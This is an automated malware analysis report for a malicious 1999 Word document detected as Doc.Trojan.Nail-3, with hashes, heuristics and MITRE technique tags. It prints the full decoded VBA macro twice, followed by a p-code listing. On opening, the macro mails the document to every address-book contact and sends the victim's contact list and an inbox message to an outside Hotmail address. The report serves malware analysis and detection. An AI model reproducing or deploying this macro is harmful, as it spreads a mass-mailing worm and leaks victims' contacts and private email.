Office (OLE) malware analysis — malicious · e65a1a731105b039

MALICIOUS

Office (OLE)

27.5 KB Created: 1999-03-05 06:16:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: cbeacd076928d63c2a5180c70e9752a5 SHA-1: 85cc25b032da9dae550c54b4ca8c238cf039edca SHA-256: e65a1a731105b039283f877f0d2ede4867a8ed9ff461939c5cfeb27473739431

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_DOCOPEN' heuristic. This macro uses 'CreateObject("MAPI.Session")' to access the user's email client and send chain emails. The script attempts to send emails to addresses from the victim's address book and also sends a separate email to 'chainnail@hotmail.com'. This behavior suggests a spam or phishing campaign, hence the 'Spearphishing Attachment' technique.

Heuristics 5

ClamAV: Doc.Trojan.Nail-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Nail-3
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5410 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5410 bytes
SHA-256: `52f7aedc480386dd29e533c1b73e68844a3ae4e367161d27000132d9e5cfdf67`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True '<!--1nternal--> 'Automated Chain Mail v0.1 Private Sub Document_Open() Randomize SubjectLines = Array("Good Times", "New Developments", "WWIII !", "Market share tipoff...") ContentLines = Array("New information on this apparent hoax...", "I thought you should know about this recent development...", "Check out CNN.Com or read this", "Please don't share this information with anyone") MesNum = Int(Rnd * 4) CRLF = Chr(13) + Chr(10) Set MAPISess = CreateObject("MAPI.Session") MAPISess.Logon MesContent = CRLF + ContentLines(MesNum) + CRLF + CRLF + MAPISess.CurrentUser Set ChainMes = MAPISess.Outbox.Messages.Add(SubjectLines(MesNum), MesContent) Set objRecipients = ChainMes.Recipients For Each AdrEntry In MAPISess.AddressLists(1).AddressEntries Set Recp = objRecipients.Add(Name:=AdrEntry.Address, Type:=3) GInfo = GInfo + AdrEntry.Address + ";" Next Set objAttach = ChainMes.Attachments.Add objAttach.Type = 1 objAttach.Source = ActiveDocument.FullName objAttach.Position = 0 objAttach.Name = MAPISess.CurrentUser GInfo = GInfo + CRLF + CRLF + MAPISess.Inbox.Messages(Int(Rnd * MAPISess.Inbox.Messages.Count) + 1).Text + CRLF GInfo = GInfo + "Thank you for your participation... 1nternal" Set Retr = MAPISess.Outbox.Messages.Add(MAPISess.CurrentUser, GInfo) Set Recp = Retr.Recipients.Add(Name:="chainnail@hotmail.com") Retr.Send ChainMes.Send MAPISess.Logoff End Sub ' Processing file: /opt/analyzer/scan_staging/26e3db8c962f478c923942559ad88378.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3371 bytes ' Line #0: ' QuoteRem 0x0000 0x000F "<!--1nternal-->" ' Line #1: ' QuoteRem 0x0000 0x0019 "Automated Chain Mail v0.1" ' Line #2: ' FuncDefn (Private Sub Document_Open()) ' Line #3: ' ArgsCall Read 0x0000 ' Line #4: ' LitStr 0x000A "Good Times" ' LitStr 0x0010 "New Developments" ' LitStr 0x0007 "WWIII !" ' LitStr 0x0016 "Market share tipoff..." ' ArgsArray Array 0x0004 ' St SubjectLines ' Line #5: ' LitStr 0x0028 "New information on this apparent hoax..." ' LitStr 0x003A "I thought you should know about this recent development..." ' LitStr 0x001E "Check out CNN.Com or read this" ' LitStr 0x002F "Please don't share this information with anyone" ' ArgsArray Array 0x0004 ' St ContentLines ' Line #6: ' Ld Rnd ' LitDI2 0x0004 ' Mul ' FnInt ' St MesNum ' Line #7: ' LitDI2 0x000D ' ArgsLd Chr 0x0001 ' LitDI2 0x000A ' ArgsLd Chr 0x0001 ' Add ' St CRLF ' Line #8: ' SetStmt ' LitStr 0x000C "MAPI.Session" ' ArgsLd CreateObject 0x0001 ' Set MAPISess ' Line #9: ' Ld MAPISess ' ArgsMemCall Logon 0x0000 ' Line #10: ' Ld CRLF ' Ld MesNum ' ArgsLd ContentLines 0x0001 ' Add ' Ld CRLF ' Add ' Ld CRLF ' Add ' Ld MAPISess ' MemLd CurrentUser ' Add ' St MesContent ' Line #11: ' SetStmt ' Ld MesNum ' ArgsLd SubjectLines 0x0001 ' Ld MesContent ' Ld MAPISess ' MemLd Outbox ' MemLd Messages ' ArgsMemLd Add 0x0002 ' Set ChainMes ' Line #12: ' SetStmt ' Ld ChainMes ' MemLd Recipients ' Set objRecipients ' Line #13: ' StartForVariable ' Ld AdrEntry ' EndForVariable ' LitDI2 0x0001 ' Ld MAPISess ' ArgsMemLd AddressLists 0x0001 ' MemLd AddressEntries ' ForEach ' Line #14: ' SetStmt ' Ld AdrEntry ' MemLd Address ' ParamNamed New ' LitDI2 0x0003 ' ParamNamed TypeOf ' Ld objRecipients ' ArgsMemLd Add 0x0002 ' Set Recp ' Line #15: ' Ld GInfo ' Ld AdrEntry ' MemLd Address ' Add ' LitStr 0x0001 ";" ' Add ' St GInfo ' Line #16: ' StartForVariable ' Next ' Line #17: ' ... (truncated)

SHA-256: 52f7aedc480386dd29e533c1b73e68844a3ae4e367161d27000132d9e5cfdf67

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Automated Chain Mail v0.1
Private Sub Document_Open()
    Randomize
    SubjectLines = Array("Good Times", "New Developments", "WWIII !", "Market share tipoff...")
    ContentLines = Array("New information on this apparent hoax...", "I thought you should know about this recent development...", "Check out CNN.Com or read this", "Please don't share this information with anyone")
    MesNum = Int(Rnd * 4)
    CRLF = Chr(13) + Chr(10)
    Set MAPISess = CreateObject("MAPI.Session")
    MAPISess.Logon
        MesContent = CRLF + ContentLines(MesNum) + CRLF + CRLF + MAPISess.CurrentUser
        Set ChainMes = MAPISess.Outbox.Messages.Add(SubjectLines(MesNum), MesContent)
        Set objRecipients = ChainMes.Recipients
        For Each AdrEntry In MAPISess.AddressLists(1).AddressEntries
            Set Recp = objRecipients.Add(Name:=AdrEntry.Address, Type:=3)
            GInfo = GInfo + AdrEntry.Address + ";"
        Next
        Set objAttach = ChainMes.Attachments.Add
        objAttach.Type = 1
        objAttach.Source = ActiveDocument.FullName
        objAttach.Position = 0
        objAttach.Name = MAPISess.CurrentUser
        GInfo = GInfo + CRLF + CRLF + MAPISess.Inbox.Messages(Int(Rnd * MAPISess.Inbox.Messages.Count) + 1).Text + CRLF
        GInfo = GInfo + "Thank you for your participation... 1nternal"
        Set Retr = MAPISess.Outbox.Messages.Add(MAPISess.CurrentUser, GInfo)
        Set Recp = Retr.Recipients.Add(Name:="chainnail@hotmail.com")
        Retr.Send
        ChainMes.Send
    MAPISess.Logoff
End Sub


' Processing file: /opt/analyzer/scan_staging/26e3db8c962f478c923942559ad88378.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3371 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000F "<!--1nternal-->"
' Line #1:
' 	QuoteRem 0x0000 0x0019 "Automated Chain Mail v0.1"
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' 	LitStr 0x000A "Good Times"
' 	LitStr 0x0010 "New Developments"
' 	LitStr 0x0007 "WWIII !"
' 	LitStr 0x0016 "Market share tipoff..."
' 	ArgsArray Array 0x0004 
' 	St SubjectLines 
' Line #5:
' 	LitStr 0x0028 "New information on this apparent hoax..."
' 	LitStr 0x003A "I thought you should know about this recent development..."
' 	LitStr 0x001E "Check out CNN.Com or read this"
' 	LitStr 0x002F "Please don't share this information with anyone"
' 	ArgsArray Array 0x0004 
' 	St ContentLines 
' Line #6:
' 	Ld Rnd 
' 	LitDI2 0x0004 
' 	Mul 
' 	FnInt 
' 	St MesNum 
' Line #7:
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St CRLF 
' Line #8:
' 	SetStmt 
' 	LitStr 0x000C "MAPI.Session"
' 	ArgsLd CreateObject 0x0001 
' 	Set MAPISess 
' Line #9:
' 	Ld MAPISess 
' 	ArgsMemCall Logon 0x0000 
' Line #10:
' 	Ld CRLF 
' 	Ld MesNum 
' 	ArgsLd ContentLines 0x0001 
' 	Add 
' 	Ld CRLF 
' 	Add 
' 	Ld CRLF 
' 	Add 
' 	Ld MAPISess 
' 	MemLd CurrentUser 
' 	Add 
' 	St MesContent 
' Line #11:
' 	SetStmt 
' 	Ld MesNum 
' 	ArgsLd SubjectLines 0x0001 
' 	Ld MesContent 
' 	Ld MAPISess 
' 	MemLd Outbox 
' 	MemLd Messages 
' 	ArgsMemLd Add 0x0002 
' 	Set ChainMes 
' Line #12:
' 	SetStmt 
' 	Ld ChainMes 
' 	MemLd Recipients 
' 	Set objRecipients 
' Line #13:
' 	StartForVariable 
' 	Ld AdrEntry 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld MAPISess 
' 	ArgsMemLd AddressLists 0x0001 
' 	MemLd AddressEntries 
' 	ForEach 
' Line #14:
' 	SetStmt 
' 	Ld AdrEntry 
' 	MemLd Address 
' 	ParamNamed New 
' 	LitDI2 0x0003 
' 	ParamNamed TypeOf 
' 	Ld objRecipients 
' 	ArgsMemLd Add 0x0002 
' 	Set Recp 
' Line #15:
' 	Ld GInfo 
' 	Ld AdrEntry 
' 	MemLd Address 
' 	Add 
' 	LitStr 0x0001 ";"
' 	Add 
' 	St GInfo 
' Line #16:
' 	StartForVariable 
' 	Next 
' Line #17:
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.